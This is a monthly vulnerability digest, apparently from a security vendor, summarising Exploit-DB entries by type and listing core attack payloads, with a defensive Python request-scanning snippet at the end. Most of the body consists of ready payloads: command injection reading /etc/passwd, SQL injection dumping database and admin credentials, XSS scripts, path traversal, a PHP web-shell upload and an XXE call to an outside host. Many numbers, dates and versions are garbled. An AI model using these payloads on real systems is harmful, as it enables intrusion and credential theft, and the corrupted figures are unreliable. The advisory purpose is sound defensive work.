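EDB Analysis Report (06.0) 06.0.0~06.0.3
Information classified by vulnerability type, as published on Exploit-DB (http://exploit-db.com).

Summary of analysis (prepared by the Penta Security Systems Security Evaluation Team)

Among the Exploit-DB entries published in the report month of 06, Cross Site Scripting vulnerabilities were reported most often. Cross Site Scripting attacks are generally carried out through a parameter value. This month, however, most of the attacks found targeted the Key, or the Value of a specific HTTP header. These vulnerabilities occur only in specific programs. Administrators who use the affected programs should identify the pages exposed to the vulnerability; secure coding of the source code appears to be urgent.

This month also brought a variety of attack patterns in which a vulnerable command or function is used as a parameter so that the corresponding action is executed immediately. We therefore recommend not using such commands or functions except in special cases. If they must be used, the filter that validates input has to check for special characters that support multi-line commands, such as the pipe (|) and the semicolon (;), so that harmful values are not passed to the function. Administrators who use software in which these vulnerabilities were found should check the affected pages and parameters and prepare for the various attacks.

1. Reports by vulnerability type
Vulnerability / Reports: 7; Information Disclosure; LFI; 6; File Upload 3; SQL 7; XSS 9; Total 9
(Chart: reports by vulnerability type)

2. Classification by risk level
Risk level / Reports / Percentage: 6.90%; 7.86%; 7.4%; Total 9, 00.00%

3. Status by attack difficulty
Attack difficulty / Reports / Percentage: 3.4%; 6, 0.69%; 7.86%; Total 9, 00.00%
(Chart: status by attack difficulty)

4. Vulnerabilities by major software
Software name / Reports: 4; Portal; Webpy; ProcessMaker; AfterLogic WebMail; Acunetix WP Security; EduSec; DNSmasq; - Multiple Vulnerabilities; Open Source Script; ManageEngine Applications Manager; PHP Realestate Script Script; PHP Imagick; Magento; extplorer; FlatPress; CakePHP; SAP xmii; Total 9
(Chart: vulnerabilities by major software)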
Date: 06-0-04
EDB number: 39766
Vulnerability: PHP Imagick 3.3.0 - / command injection vulnerability
Attack code:
    /image.jpg" cat /etc/passwd>a.txt"
Target program: PHP Imagick
Target environment: PHP Imagick 3.3.0

Date: 06-0-04
EDB number: 3976
Category: XSS
Vulnerability: <.9 0 - ipinfo.cgi XSS vulnerability
Attack code:
    /cgi-bin/ipinfo.cgi?<script>alert(/rxss-yann_cam_-_Security_Consultant_@ASafety_-_SYNETIS/)</script>
Target: <.9 0

Date: 06-0-04
EDB number: 3976
Category: XSS
Vulnerability: Acunetix WP Security Plugin 3.0.3 - XSS vulnerability
Attack code:
    /wordpress/?s="><script>alert("johto.robbie"</script>
Target program: Acunetix WP Security
Target environment: Acunetix WP Security Plugin 3.0.

Date: 06-0-04
EDB number: 3976
Category: XSS
Vulnerability: <.9 0 - ipinfo.cgi XSS vulnerability ()
Attack code:
    /cgibin/ipinfo.cgi?<script>eval(unescape("..."))</script>
Target: <.9 0

Date: 06-0-04
EDB number: 3976
Vulnerability: <.9 0 - ipinfo.cgi vulnerability (3)
Attack code:
    POST / HTTP/.
    User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7
    NCSA_PASS= touch /tmp/x;#&ncsa_pass_confirm= touch /tmp/x;#&ncsa_username=yanncam&action=ajouter
Target: <.9 0

Date: 06-0-04
EDB number: 3976
Vulnerability: <.9 0 - ipinfo.cgi vulnerability (4)
Attack code:
    POST / HTTP/.
    User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7
    NCSA_PASS= eval `echo -e "..." openssl enc -a - d`;#&ncsa_pass_confirm= eval `echo -e "...
Target: <.9 0
Date: 06-0-06
EDB number: 39780
Category: SQL
Vulnerability: ManageEngine Applications Manager Build 700 - downtimescheduler.do SQL vulnerability
Attack code:
    /downtimescheduler.do?method=viewmaintenancetask&taskid=-%0UNION%0ALL%0SELECT%0,,database(),4,,6,7,8,9,0,,,3,4,%0--
Target program: ManageEngine Applications Manager
Target environment: ManageEngine Applications Manager Build 70

Date: 06-0-09
EDB number: 39784
Vulnerability: - createpdf.php vulnerability
Attack code:
    /createpdf.php?targeturl=ly4uly4uly4uly4uly4uly4uly4uLy4uLV0Yy9wYXNzdQ=&&pay_id=4&&type=actual
Target: - Multiple Vulnerabilities

Date: 06-0-09
EDB number: 39784
Category: XSS
Vulnerability: - createpdf.php XSS vulnerability ()
Attack code:
    POST / HTTP/.
    User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7
    screen_name="><script><<imgimg SRC=oi onerror=javascript:alert()>

Date: 06-0-6
EDB number: 398
Category: LFI
Vulnerability: Webpy.4. - pack_custom LFI vulnerability ()
Attack code:
    POST /admin/default/pack_custom/test HTTP/.
    User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7
    file=/etc/passwd
Target program: Webpy
Target environment: Webpy.4.

Date: 06-0-6
EDB number: 3987
Category: SQL
Vulnerability: Web interface for DNSmasq / Mikrotik - dns.php SQL vulnerability
Attack code:
    /dns_dhcp/dns/dns.php?net=%0and%0(select%0%0from(select%0count(*),concat((select%0(select%0concat(0xb,host,0xb,user,0xb,password,0xb))%0from%0mysql.user%0limit%0),floor(rand(0)*))x%0from%0mysql.user%0group%0by%0x)a)
Target program: DNSmasq
Target environment: Web interface for DNSmasq

Date: 06-0-6
EDB number: 3986
Category: File Upload
Vulnerability: extplorer..9 - Archive Path
Attack code:
    POST / HTTP/.
    User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
    -------------7dd009908f
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="file"; filename="filename.php"
    <?php exec($_get["cmd"]);?>
    -----------------------------7dd009908f--
Target program: extplorer
Target environment: extplorer..

Date: 06-0-6
EDB number: 3983
Category: XSS
Vulnerability: CakePHP Framework 3..4 - /cake/cake3/ XSS vulnerability
Attack code:
    GET /cake/cake3/ HTTP/.
    CLIENT-IP: 00.00.300.400 <script>alert('poc');</script>
Target program: CakePHP
Target environment: CakePHP Framework 3..4

Date: 06-0-6
EDB number: 398
Category: XSS
Vulnerability: Webpy.4. - /admin/default/install_plugin/ XSS vulnerability
Attack code:
    /admin/default/install_plugin/test?plugin=mathpy&source=javascript:alert()
Target program: Webpy
Target environment: Webpy.4.

Date: 06-0-7
EDB number: 39837
Vulnerability: SAP xmii.0 - /XMII/ vulnerability
Attack code:
    /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
Target program: SAP xmii
Target environment: SAP xmii.0
Columns: Date, EDB number, Vulnerability category, Attack difficulty, Attack risk, Vulnerability name, Core attack code, Target program, Target environment

Date: 06-0-8
EDB number: 39838
Vulnerability: Magento <.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File
Attack code:
    POST /rest/v/guest-carts/test/set-payment-information HTTP/.
    User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7
    Content-Type: application/json
    {"paymentmethod":{"method":"checkmo","additional_data":{"additional_information":"...
Target program: Magento
Target environment: Magento <.0.6

Date: 06-0-3
EDB number: 39849
Category: SQL
Vulnerability: .4. for XenForo - Multiple SQL s ()
Attack code:
    /api.php?action=getgroup&value=' UNION ALL SELECT NULL%CNULL%CNULL%CNULL%CNULL%CCONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%C0x0))%CNULL%3
Target: .4. for XenForo

Date: 06-0-3
EDB number: 39849
Category: SQL
Vulnerability: .4. for XenForo - Multiple SQL s
Attack code:
    /api.php?action=getusers&value=' UNION ALL SELECT CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%C0x0))%CNULL%3
Target: .4. for XenForo

Date: 06-0-4
EDB number: 3980
Category: Information Disclosure
Vulnerability: AfterLogic WebMail Pro ASP.NET 6..6 - Administrator Account Disclosure via XXE
Attack code:
    /spellcheck.aspx?xml=<?xml version=".0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://8.7..9/test.dtd"> %remote; %int; %trick;]>
Target program: AfterLogic WebMail
Target environment: AfterLogic WebMail Pro ASP.NET 6..6

Date: 06-0-6
EDB number: 398
Category: File Upload
Vulnerability: Portal 4. - File Upload ()
Attack code:
    POST /upload.php HTTP/.
    User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
    -------------7dd009908f
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="file"; filename="test.php"
    <? phpinfo();?>
    -----------------------------7dd009908f--
Target program: Portal
Target environment: Portal 4.

Date: 06-0-6
EDB number: 3986
Category: SQL
Vulnerability: EduSec 4.. - SQL
Attack code:
    /student/stumaster/view?id=%0union%0select%0,load_file(%7/etc/passwd%7),3,4,,6,7,8,9,0,,,3,4,,6,7,8--
Target program: EduSec
Target environment: EduSec 4..

Date: 06-0-6
EDB number: 398
Category: XSS
Vulnerability: Portal 4. - XSS ()
Attack code:
    /index.php?title=onmousemove=alert()
Target program: Portal
Target environment: Portal 4.

Date: 06-0-7
EDB number: 39864
Category: SQL
Vulnerability: PHP Realestate Script Script 4.9.0 - SQL
Attack code:
    /single.php?view_id=-7+/*!0000union*/+select+,,user_name,4,,6,7,8,password,0,,,3,4,,6,7,8,9,0,,,3,4,,6+from+admin_login
Target program: PHP Realestate Script Script
Target environment: PHP Realestate Script Script 4.9.0

Date: 06-0-30
EDB number: 39868
Category: SQL
Vulnerability: Open Source Script 3.6.0 - SQL
Attack code:
    /contact_view.php?contact=-7%7+/*!0000union*/+select+,,3,4,,6,7,8,9,0,,0,3,4,,6,7,8,9,0,username,,password,4,,6,7,8,9,30,3,3,33,34,3,36,37+/*!0000from*/+/*!0000admin_login*/%3
Target program: Open Source Script
Target environment: Open Source Script 3.6.0
Date: 06-0-3
EDB number: 3987
Category: XSS
Vulnerability: ProcessMaker 3.0..7 - /sysworkflow/en/neoclassic/processproxy/saveprocess XSS vulnerability
Attack code:
    POST / HTTP/.
    User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7
    PRO_TITLE=AA<img src=x onerror=alert()>a&pro_description=bbb&pro_cateGORY=
Target program: ProcessMaker
Target environment: ProcessMaker 3.0..7

Date: 06-0-3
EDB number: 3987
Category: LFI
Vulnerability: NanoStation M.6-beta - scr.cgi LFI vulnerability
Attack code:
    /scr.cgi?fname=../../../../../etc/passwd%00&status=
Target: NanoStation M.6-bet

Date: 06-0-3
EDB number: 39870
Category: File Upload
Vulnerability: FlatPress.0.3 - admin.php File Upload vulnerability
Attack code:
    POST /flatpress/admin.php?p=uploader&action=default HTTP/.
    User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
    -------------7dd009908f
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="upload[]"; filename="test.php"
    <? phpinfo();?>
    -----------------------------7dd009908f--
Target program: FlatPress
Target environment: FlatPress.0.3

Date: 06-0-3
EDB number: 3987
Category: XSS
Vulnerability: ProcessMaker 3.0..7 - /sysworkflow/en/neoclassic/processes/processeslist XSS vulnerability #
Attack code:
    POST /sysworkflow/en/neoclassic/processes/processeslist HTTP/.
    User-Agent: Mozilla/.0 Windows NT 6.; WOW64 Chrome/6.0.9.7
    processname=<img src=x onerror=alert();>&start=0&limit=&category=%3creset%3E=
Target program: ProcessMaker
Target environment: ProcessMaker 3.0..7

Date: 06-0-3
EDB number: 3987
Vulnerability: NanoStation M.6-beta - scr.cgi vulnerability
Attack code:
    /scr.cgi?fname=rc.poststart.sh;cat%0/etc/hosts%00&status=
Target: NanoStation M.6-bet
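The two observations in the analysis summary (script payloads arriving in a parameter Key or an HTTP header Value rather than a parameter Value, and pipe or semicolon chaining in parameters that reach a command) can be expressed as one request check. This is an added example, not part of the original report; scan_request, the command_params list, the metacharacters beyond | and ;, and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Characters that chain or redirect shell commands. The report names the pipe
# and the semicolon; the others are an assumption added for this example.
SHELL_META = re.compile(r"[|;&`$<>\n]")
# Heuristic for script markup (tags, event handlers, javascript: URLs).
SCRIPT_MARK = re.compile(r"<\s*(script|img|svg|iframe)\b|\bon\w+\s*=|javascript:", re.I)

def scan_request(query, headers, command_params=()):
    """Return (location, name, reason) findings for one request.

    query          -- raw query string or urlencoded POST body
    headers        -- dict of header name -> raw value
    command_params -- hypothetical list of parameters the application is
                      known to pass to an OS command or exec-style function
    """
    findings = []
    # keep_blank_values keeps a bare "?<payload>" as a key with an empty value;
    # separator="&" keeps ";" inside the value so it can be inspected.
    for key, value in parse_qsl(query, keep_blank_values=True, separator="&"):
        if SCRIPT_MARK.search(key):
            findings.append(("key", key, "script markup in parameter name"))
        if SCRIPT_MARK.search(value):
            findings.append(("value", key, "script markup in parameter value"))
        if key in command_params and SHELL_META.search(value):
            findings.append(("value", key, "shell metacharacter in command parameter"))
    for name, value in headers.items():
        if SCRIPT_MARK.search(unquote(value)):
            findings.append(("header", name, "script markup in header value"))
    return findings

# Constructed sample requests modelled on the entry types in the report.
SAMPLES = [
    ("<script>alert(1)</script>", {}, ()),                      # payload is the key
    ("", {"CLIENT-IP": "<script>alert('poc');</script>"}, ()),  # payload in a header
    ("fname=status.sh;id&status=", {}, ("fname",)),             # chained command
    ("fname=status.sh&status=1", {"User-Agent": "Mozilla/5.0"}, ("fname",)),  # benign
]

if __name__ == "__main__":
    for query, headers, cmd in SAMPLES:
        print(repr(query), headers, "->", scan_request(query, headers, cmd))
```

A filter that inspects only parameter values returns nothing for the first two samples, which is the gap the summary describes.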